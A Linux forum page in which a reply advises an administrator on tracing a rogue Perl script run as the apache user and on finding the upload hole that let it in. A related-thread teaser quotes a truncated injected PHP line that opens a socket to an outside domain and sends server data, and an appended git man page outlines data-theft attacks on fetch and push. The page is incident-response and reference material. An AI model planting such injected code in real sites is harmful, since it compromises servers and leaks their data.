Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Malicious perl script
Operating Systems Linux Debian Malicious perl script Post 302992364 by drysdalk on Friday 24th of February 2017 07:49:10 AM
Old 02-24-2017
Hi,

The error messages you got from 'ls' would mean that that PID 4600 no longer exists - in other words, the process with ID 4600 has since exited. These kinds of things only tend to hang around for so long, and you really need to catch them right in the act to have any decent chance of easily tracking them down. If you see any other suspicious processes still (to recap, that would be processes owned by 'apache' but which claim to be anything other than 'httpd') then have a look at their entries in the /proc filesystem in the same way. But most likely it's all over and done with by now.

Unfortunately, the bigger problem you have here is not in fact the rogue scripts themselves, but the question of how they came to be on your system in the first place. In my experience, an attacker finds something they can exploit, like a file upload form without sufficient security protection, or some other script that they can exploit to make it upload things to a globally-writable location on the server. Once they upload their script, they then run it, it hangs about for a bit while it does its thing, then exits.

So the more important thing you have to do here is figure out how the attackers got these scripts on your system. The fact that they might still be somewhere on your server is certainly a problem, but a bigger problem is the fact that they were able to be on your server at all in the first place. In all likelihood you have a security hole somewhere that could be exploited by the same attacker again, or an entirely different attacker in the future.
 

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies

2. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies

3. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies

4. Shell Programming and Scripting

calling a perl script with arguments from a parent perl script

I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard. From parent.pl $input1=123; $input2=abc; I tried calling it with system("/usr/bin/perl child.pl $input1 $input2"); and `perl... (1 Reply)
Discussion started by: grajp002
1 Replies

5. Shell Programming and Scripting

Perl : embedding java script with cgi perl script

Hi All, I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ?? print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">"); print("<input type = "text"... (1 Reply)
Discussion started by: scriptscript
1 Replies

6. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

7. Programming

PERL: In a perl-scripttTrying to execute another perl-script that SETS SOME VARIABLES !

I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open()) I would like to run another PERL-script from first one, not... (1 Reply)
Discussion started by: alex_5161
1 Replies

LEARN ABOUT XFREE86

gitnamespaces

GITNAMESPACES(7)						    Git Manual							  GITNAMESPACES(7)

NAME

       gitnamespaces - Git namespaces

SYNOPSIS

       GIT_NAMESPACE=<namespace> git upload-pack
       GIT_NAMESPACE=<namespace> git receive-pack

DESCRIPTION

       Git supports dividing the refs of a single repository into multiple namespaces, each of which has its own branches, tags, and HEAD. Git can
       expose each namespace as an independent repository to pull from and push to, while sharing the object store, and exposing all the refs to
       operations such as git-gc(1).

       Storing multiple repositories as namespaces of a single repository avoids storing duplicate copies of the same objects, such as when
       storing multiple branches of the same source. The alternates mechanism provides similar support for avoiding duplicates, but alternates do
       not prevent duplication between new objects added to the repositories without ongoing maintenance, while namespaces do.

       To specify a namespace, set the GIT_NAMESPACE environment variable to the namespace. For each ref namespace, Git stores the corresponding
       refs in a directory under refs/namespaces/. For example, GIT_NAMESPACE=foo will store refs under refs/namespaces/foo/. You can also specify
       namespaces via the --namespace option to git(1).

       Note that namespaces which include a / will expand to a hierarchy of namespaces; for example, GIT_NAMESPACE=foo/bar will store refs under
       refs/namespaces/foo/refs/namespaces/bar/. This makes paths in GIT_NAMESPACE behave hierarchically, so that cloning with
       GIT_NAMESPACE=foo/bar produces the same result as cloning with GIT_NAMESPACE=foo and cloning from that repo with GIT_NAMESPACE=bar. It also
       avoids ambiguity with strange namespace paths such as foo/refs/heads/, which could otherwise generate directory/file conflicts within the
       refs directory.

       git-upload-pack(1) and git-receive-pack(1) rewrite the names of refs as specified by GIT_NAMESPACE. git-upload-pack and git-receive-pack
       will ignore all references outside the specified namespace.

       The smart HTTP server, git-http-backend(1), will pass GIT_NAMESPACE through to the backend programs; see git-http-backend(1) for sample
       configuration to expose repository namespaces as repositories.

       For a simple local test, you can use git-remote-ext(1):

	   git clone ext::'git --namespace=foo %s /tmp/prefixed.git'

SECURITY

       The fetch and push protocols are not designed to prevent one side from stealing data from the other repository that was not intended to be
       shared. If you have private data that you need to protect from a malicious peer, your best option is to store it in another repository.
       This applies to both clients and servers. In particular, namespaces on a server are not effective for read access control; you should only
       grant read access to a namespace to clients that you would trust with read access to the entire repository.

       The known attack vectors are as follows:

	1. The victim sends "have" lines advertising the IDs of objects it has that are not explicitly intended to be shared but can be used to
	   optimize the transfer if the peer also has them. The attacker chooses an object ID X to steal and sends a ref to X, but isn't required
	   to send the content of X because the victim already has it. Now the victim believes that the attacker has X, and it sends the content
	   of X back to the attacker later. (This attack is most straightforward for a client to perform on a server, by creating a ref to X in
	   the namespace the client has access to and then fetching it. The most likely way for a server to perform it on a client is to "merge" X
	   into a public branch and hope that the user does additional work on this branch and pushes it back to the server without noticing the
	   merge.)

	2. As in #1, the attacker chooses an object ID X to steal. The victim sends an object Y that the attacker already has, and the attacker
	   falsely claims to have X and not Y, so the victim sends Y as a delta against X. The delta reveals regions of X that are similar to Y to
	   the attacker.

Git 2.17.1							    10/05/2018							  GITNAMESPACES(7)
All times are GMT -4. The time now is 09:55 PM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy